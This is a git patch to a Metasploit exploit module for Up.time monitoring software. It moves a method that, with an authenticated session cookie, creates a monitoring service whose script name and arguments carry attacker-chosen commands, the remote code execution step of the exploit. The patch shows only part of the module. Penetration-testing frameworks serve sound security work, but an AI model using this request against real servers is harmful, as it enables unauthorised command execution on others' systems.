From 6f02cedff8cb2ce844e773f93ca4e1de3b90cf0e Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 23 Oct 2015 13:10:00 -0500
Subject: [PATCH] Move method create_exec_service

---
 .../exploits/multi/http/uptime_code_exec.rb   | 178 +++++++++---------
 1 file changed, 88 insertions(+), 90 deletions(-)

diff --git a/modules/exploits/multi/http/uptime_code_exec.rb b/modules/exploits/multi/http/uptime_code_exec.rb
index 5cb9e675b5..b3ac14f82b 100644
--- a/modules/exploits/multi/http/uptime_code_exec.rb
+++ b/modules/exploits/multi/http/uptime_code_exec.rb
@@ -64,6 +64,94 @@ class Metasploit4 < Msf::Exploit::Remote
     Exploit::CheckCode::Safe
   end
 
+  def create_exec_service(*args)
+    cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs = *args
+    res_service = send_request_cgi(
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, 'main.php'),
+      'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
+      'vars_get' => {
+        'section'          => 'ERDCInstance',
+        'subsection'       => 'add',
+      },
+      'vars_post' => {
+        'initialERDCId' => '20',
+        'target' => '1',
+        'targetType' => 'systemList',
+        'systemList' => '1',
+        'serviceGroupList' => '-10',
+        'initialMode' => 'standard',
+        'erdcName' => 'Exploit',
+        'erdcInitialName' => '',
+        'erdcDescription' => 'Exploit',
+        'hostButton' => 'system',
+        'erdc_id' => '20',
+        'forceReload' => '0',
+        'operation' => 'standard',
+        'erdc_instance_id' => '',
+        'label_[184]' => 'Script Name',
+        'value_[184]' => cmd,
+        'id_[184]' => 'process',
+        'name_[process]' => '184',
+        'units_[184]' => '',
+        'guiBasic_[184]' => '1',
+        'inputType_[184]' => 'GUIString',
+        'screenOrder_[184]' => '1',
+        'parmType_[184]' => '1',
+        'label_[185]' => 'Arguments',
+        'value_[185]' => cmdargs,
+        'id_[185]' => 'args',
+        'name_[args]' => '185',
+        'units_[185]' => '',
+        'guiBasic_[185]' => '1',
+        'inputType_[185]' => 'GUIString',
+        'screenOrder_[185]' => '2',
+        'parmType_[185]' => '1',
+        'label_[187]' => 'Output',
+        'can_retain_[187]' => 'false',
+        'comparisonWarn_[187]' => '-1',
+        'comparison_[187]' => '-1',
+        'id_[187]' => 'value_critical_output',
+        'name_[output]' => '187',
+        'units_[187]' => '',
+        'guiBasic_[187]' => '1',
+        'inputType_[187]' => 'GUIString',
+        'screenOrder_[187]' => '4',
+        'parmType_[187]' => '2',
+        'label_[189]' => 'Response time',
+        'can_retain_[189]' => 'false',
+        'comparisonWarn_[189]' => '-1',
+        'comparison_[189]' => '-1',
+        'id_[189]' => 'value_critical_timer',
+        'name_[timer]' => '189',
+        'units_[189]' => 'ms',
+        'guiBasic_[189]' => '0',
+        'inputType_[189]' => 'GUIInteger',
+        'screenOrder_[189]' => '6',
+        'parmType_[189]' => '2',
+        'timing_[erdc_instance_monitored]' => '1',
+        'timing_[timeout]' => '60',
+        'timing_[check_interval]' => '10',
+        'timing_[recheck_interval]' => '1',
+        'timing_[max_rechecks]' => '3',
+        'alerting_[notification]' => '1',
+        'alerting_[alert_interval]' => '120',
+        'alerting_[alert_on_critical]' => '1',
+        'alerting_[alert_on_warning]' => '1',
+        'alerting_[alert_on_recovery]' => '1',
+        'alerting_[alert_on_unknown]' => '1',
+        'time_period_id' => '1',
+        'pageFinish' => 'Finish',
+        'pageContinue' => 'Continue...',
+        'isWizard' => '1',
+        'wizardPage' => '2',
+        'wizardNumPages' => '2',
+        'wizardTask' => 'pageFinish',
+        'visitedPage[1]' => '1',
+        'visitedPage[2]' => '1'
+      })
+  end
+
   def exploit
     vprint_status('Trying to login...')
     # #Application Login
@@ -173,96 +261,6 @@ class Metasploit4 < Msf::Exploit::Remote
         print_good('Priv. Escalation success')
       end
 
-      # CREATING EXEC Service
-
-      def create_exec_service(*args)
-        cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs = *args
-        res_service = send_request_cgi(
-          'method' => 'POST',
-          'uri'    => normalize_uri(target_uri.path, 'main.php'),
-          'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
-          'vars_get' => {
-            'section'          => 'ERDCInstance',
-            'subsection'       => 'add',
-          },
-          'vars_post' => {
-            'initialERDCId' => '20',
-            'target' => '1',
-            'targetType' => 'systemList',
-            'systemList' => '1',
-            'serviceGroupList' => '-10',
-            'initialMode' => 'standard',
-            'erdcName' => 'Exploit',
-            'erdcInitialName' => '',
-            'erdcDescription' => 'Exploit',
-            'hostButton' => 'system',
-            'erdc_id' => '20',
-            'forceReload' => '0',
-            'operation' => 'standard',
-            'erdc_instance_id' => '',
-            'label_[184]' => 'Script Name',
-            'value_[184]' => cmd,
-            'id_[184]' => 'process',
-            'name_[process]' => '184',
-            'units_[184]' => '',
-            'guiBasic_[184]' => '1',
-            'inputType_[184]' => 'GUIString',
-            'screenOrder_[184]' => '1',
-            'parmType_[184]' => '1',
-            'label_[185]' => 'Arguments',
-            'value_[185]' => cmdargs,
-            'id_[185]' => 'args',
-            'name_[args]' => '185',
-            'units_[185]' => '',
-            'guiBasic_[185]' => '1',
-            'inputType_[185]' => 'GUIString',
-            'screenOrder_[185]' => '2',
-            'parmType_[185]' => '1',
-            'label_[187]' => 'Output',
-            'can_retain_[187]' => 'false',
-            'comparisonWarn_[187]' => '-1',
-            'comparison_[187]' => '-1',
-            'id_[187]' => 'value_critical_output',
-            'name_[output]' => '187',
-            'units_[187]' => '',
-            'guiBasic_[187]' => '1',
-            'inputType_[187]' => 'GUIString',
-            'screenOrder_[187]' => '4',
-            'parmType_[187]' => '2',
-            'label_[189]' => 'Response time',
-            'can_retain_[189]' => 'false',
-            'comparisonWarn_[189]' => '-1',
-            'comparison_[189]' => '-1',
-            'id_[189]' => 'value_critical_timer',
-            'name_[timer]' => '189',
-            'units_[189]' => 'ms',
-            'guiBasic_[189]' => '0',
-            'inputType_[189]' => 'GUIInteger',
-            'screenOrder_[189]' => '6',
-            'parmType_[189]' => '2',
-            'timing_[erdc_instance_monitored]' => '1',
-            'timing_[timeout]' => '60',
-            'timing_[check_interval]' => '10',
-            'timing_[recheck_interval]' => '1',
-            'timing_[max_rechecks]' => '3',
-            'alerting_[notification]' => '1',
-            'alerting_[alert_interval]' => '120',
-            'alerting_[alert_on_critical]' => '1',
-            'alerting_[alert_on_warning]' => '1',
-            'alerting_[alert_on_recovery]' => '1',
-            'alerting_[alert_on_unknown]' => '1',
-            'time_period_id' => '1',
-            'pageFinish' => 'Finish',
-            'pageContinue' => 'Continue...',
-            'isWizard' => '1',
-            'wizardPage' => '2',
-            'wizardNumPages' => '2',
-            'wizardTask' => 'pageFinish',
-            'visitedPage[1]' => '1',
-            'visitedPage[2]' => '1'
-          })
-      end
-
       # CREATING Linux EXEC Service
       if res_auth && res_auth.headers['Server'] =~ /Unix/
         vprint_status('Creating Linux Monitor Code exec...')